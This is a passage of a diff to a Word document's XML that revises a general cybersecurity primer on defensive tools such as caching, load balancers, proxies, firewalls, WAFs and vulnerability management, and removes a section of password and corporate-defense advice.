+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">facing web application. The content caching software will work as a proxy to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">company's web infrastructure and render cached contents to the browser whenever available. If the content is not already cached, the software will fetch the content, cache it and then </w:t>
+      </w:r>
+      <w:r>
+        <w:t>yield</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to the browser. This way, the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>subsequen</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t request will be served from the cache. Of course, this mechanism does not help if the content changes on every request, but it works for a large portion of the website. Akamai is a well-known content caching software that is widely used for this type of caching. Akamai has distribute</w:t>
+      </w:r>
+      <w:r>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> network</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> throughout the globe.  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Load Balancing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Having only one web server that handles all the traffic is </w:t>
+      </w:r>
+      <w:r>
+        <w:t>hazardous</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. So, companies put out many web servers. These servers distribute the traffic among themselves by using a load balancer in front of them. The browser hits the load</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">balancer and </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>load</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>balancer - in turn - decides which server has capacity and hands off the traffic to that server. F5 Big IP is a popular load</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">balancer. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Proxy Servers</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>There are two kinds of proxy servers that are in use:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Forward proxy: Forward proxy will </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">receive </w:t>
+      </w:r>
+      <w:r>
+        <w:t>request</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> clients (browser) and forward it </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the ultimate destination or block it based on examination results. For example, a browser proxy might refuse to let you go to a site known to have malware embedded in </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">content. Forward proxy protects clients from malleolus or undesirable contents. Zscaler Cloud Firewall is a popular browser proxy that handles SSL inspection.  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Reverse proxy: A reverse proxy will take requests on behalf of servers before handing </w:t>
+      </w:r>
+      <w:r>
+        <w:t>them</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> off to a server. Reverse proxy protects servers from cyber-attacks. With multiple web servers in place, a load balancer is enough. When you have only one server, a reverse proxy makes sense to secure the webserver. NGINX</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">pronounced </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Engine</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">X) Plus can act as </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:t>reverse proxy. By the way</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> "NGINX" is a popular web server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Firewalls</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">As discussed earlier </w:t>
+      </w:r>
+      <w:r>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:t>irewall</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> protect servers and ports. It also allows </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>creation of DMZ so that only public</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">facing servers are exposed to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">rest of the infrastructure is protected behind </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:t>strict firewall. Palo Alto is a popular firewall software used for this purpose.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Web Application Firewalls</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">A web application firewall filters, monitors, and blocks HTTP traffic to and from a web application. A WAF is differentiated from a regular firewall in that a WAF </w:t>
+      </w:r>
+      <w:r>
+        <w:t>can</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> filter the content of specific web applications</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. In contrast,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>typical</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> firewalls serve as a safety gate by blocking IPs/ports. A WAF can stop denial o</w:t>
+      </w:r>
+      <w:r>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> service attack</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, can block users of specific geographic area</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and many other things using </w:t>
+      </w:r>
+      <w:r>
+        <w:t>sophisticated</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> rules. Imperva WAF is a popular tool for this purpose. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">In </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>case of distributed denial of service attack</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>even a WAF is not enough</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. The problem is there </w:t>
+      </w:r>
+      <w:r>
+        <w:t>are</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> two kind</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> of bots - good bots and bad bots. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Search engines deploy good bot</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s like google, bing</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> etc. to crawl your site and index your pages for search results. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>The hackers deploy bad bot</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">s. An </w:t>
+      </w:r>
+      <w:r>
+        <w:t>organization</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> should entertain good bots and block bad bots. This is hard to do. In those </w:t>
+      </w:r>
+      <w:r>
+        <w:t>cases,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> tools are needed to identify the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>signature</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> of the bad bots. Tools like Distill from Distill Network can be used to protect from bad bots. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3915,860 +4608,33 @@
           <w:b/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Use Long Password</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Longer</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> sentences for </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>password</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> are better than </w:t>
+        <w:t>Vulnerability Management</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Vulnerabilities of servers and networks pop up regularly. Companies need </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
       <w:r>
-        <w:t>c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ryptic but short password.</w:t>
+        <w:t>tool to discover them, prioritize them and finally confirm that exposure has been remediated. Nexpose, Rapid7</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:t>isspell a word or two</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> in your password to avoid </w:t>
-      </w:r>
-      <w:r>
-        <w:t>"</w:t>
-      </w:r>
-      <w:r>
-        <w:t>Dictionary Attack</w:t>
-      </w:r>
-      <w:r>
-        <w:t>"</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Use Two Factor Authentication</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Use 2-factor authentication whenever possible. This will force you to login using your password and your phone/email. This increases your defense by many factors.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> This is inconvenient even for you, therefore, much more secure.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Unique</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Password</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
+        <w:t>are examples of some</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> vulnerability management software</w:t>
+      </w:r>
+      <w:r>
         <w:t>s</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Passwords must be unique </w:t>
-      </w:r>
-      <w:r>
-        <w:t>o</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n every site. Never use the same in two sites.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> A stolen/cracked password from one site is bad enough</w:t>
-      </w:r>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> you don</w:t>
-      </w:r>
-      <w:r>
-        <w:t>'</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">t want another site to be compromised because you were lazy enough to use the same password </w:t>
-      </w:r>
-      <w:r>
-        <w:t>o</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n two sites.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Use Password Manager</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Password Manager is a great way to store all your passwords in a secure</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> place, no matter how long or</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> complex they are</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Dashlane</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, 1Password, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>LastPass</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>etc.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> are </w:t>
-      </w:r>
-      <w:r>
-        <w:t>great tool</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> for this. Make sure you use 2-factor authentication to log</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>in to your password manager</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> and your password manager logs you out 1) when idle for few seconds 2) when you close your browser. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Cyber </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Defense</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Corporate</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">What do corporations do to improve cyber </w:t>
-      </w:r>
-      <w:r>
-        <w:t>defense</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">? There are many tools and techniques that corporations use to </w:t>
-      </w:r>
-      <w:r>
-        <w:t>enhanc</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">e their cybersecurity. Below are some of the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>method</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s and tools:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Disk Encryption</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Tools like McAfee Drive Encryption is full disk encryption software that helps protect data on Microsoft Windows tablets, laptops, and PCs to prevent the loss of sensitive data, especially from lost or stolen equipment.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Antivirus Software</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Tools like McAfee Anti-virus software is installed in all servers and workstations to stop malware from attacking machines. These tools receive </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">frequent update on the list of </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and their protective mechanism.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Patching and Upgrades</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Continuous patching and upgrades of </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">phones, tablets, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>workstations</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, and</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> server</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> keep corporates protected from </w:t>
-      </w:r>
-      <w:r>
-        <w:t>vulnerabilities</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. Tools like IBM BigFix allows </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:t>corporation to keep their workstations</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> and servers</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>up-to-date</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> with patches and upgrades.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Email Quarantine Software</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Spam emails and Phishing attacks are everyday events in today</w:t>
-      </w:r>
-      <w:r>
-        <w:t>'s</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> world. Companies use tools to quarantine emails to block such attempts. Proofpoint Protection Server is </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">a tool that monitors incoming emails and filters </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>them, and</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> presents</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> block reports to the users.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Content Caching</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>One of the best way</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to provide </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">quick response and defend </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">against </w:t>
-      </w:r>
-      <w:r>
-        <w:t>denial of service</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (DOS)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> attack is to use distributed content caching software in front of </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>public</w:t>
-      </w:r>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">facing web application. The content caching software will work as a proxy to </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">company's web infrastructure and render cached contents to the browser whenever available. If the content is not already cached, the software will fetch the content, cache it and then </w:t>
-      </w:r>
-      <w:r>
-        <w:t>yield</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to the browser. This way, the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>subsequen</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t request will be served from the cached. Of course, this mechanism does not help if the content changes on every request, but it works for a large portion of the website. Akamai is a well-known content caching software that is widely used for this type of caching. Akamai has distribute</w:t>
-      </w:r>
-      <w:r>
-        <w:t>d</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> network throughout the globe.  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Load Balancing</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Having only one web server that handles all the traffic is </w:t>
-      </w:r>
-      <w:r>
-        <w:t>hazardous</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. So, companies put out many web servers. These servers distribute the traffic among themselves by using a load balancer in front of them. The browser hits the load</w:t>
-      </w:r>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:t>balancer and load</w:t>
-      </w:r>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:t>balancer - in turn - decides which server has capacity and hands off the traffic to that server. F5 Big IP is a popular load</w:t>
-      </w:r>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">balancer. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Proxy Servers</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>There are two kinds of proxy servers that are in use:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Forward proxy: Forward proxy will </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">receive </w:t>
-      </w:r>
-      <w:r>
-        <w:t>request</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> clients (browser) and forward it </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">to </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the ultimate destination or block it based on examination results. For example, a browser proxy </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">might refuse to let you go to a site known to have malware embedded in </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">content. Forward proxy protects clients from malleolus or undesirable contents. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Zscaler</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Cloud Firewall is a popular browser proxy that handles SSL inspection.  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Reverse proxy: A reverse proxy will take requests on behalf of servers before handing </w:t>
-      </w:r>
-      <w:r>
-        <w:t>them</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> off to a server. Reverse proxy protects servers from cyber-attacks. With multiple web servers in place, a load balancer is enough. When you have only one server, a reverse proxy makes sense to secure the webserver. NGINX</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">pronounced </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Engine</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">X) Plus can act as </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:t>reverse proxy. By the way</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> "NGINX" is a popular web server.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Firewalls</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">As </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>discussed</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> earlier </w:t>
-      </w:r>
-      <w:r>
-        <w:t>f</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">irewall protects servers and ports. It also allows </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>creation of DMZ so that only public</w:t>
-      </w:r>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">facing servers are exposed to </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the </w:t>
-      </w:r>
-      <w:r>
-        <w:t>public</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">rest of the infrastructure is protected behind </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:t>strict firewall. Palo Alto is a popular firewall software used for this purpose.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Web Application Firewalls</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">A web application firewall filters, monitors, and blocks HTTP traffic to and from a web application. A WAF is differentiated from a regular firewall in that a WAF </w:t>
-      </w:r>
-      <w:r>
-        <w:t>can</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> filter the content of specific web applications</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. In contrast,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>typical</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> firewalls serve as a safety gate by blocking IPs/ports. A WAF can stop denial o</w:t>
-      </w:r>
-      <w:r>
-        <w:t>f</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> service attack</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, can block users of specific geographic area</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> and many other things using </w:t>
-      </w:r>
-      <w:r>
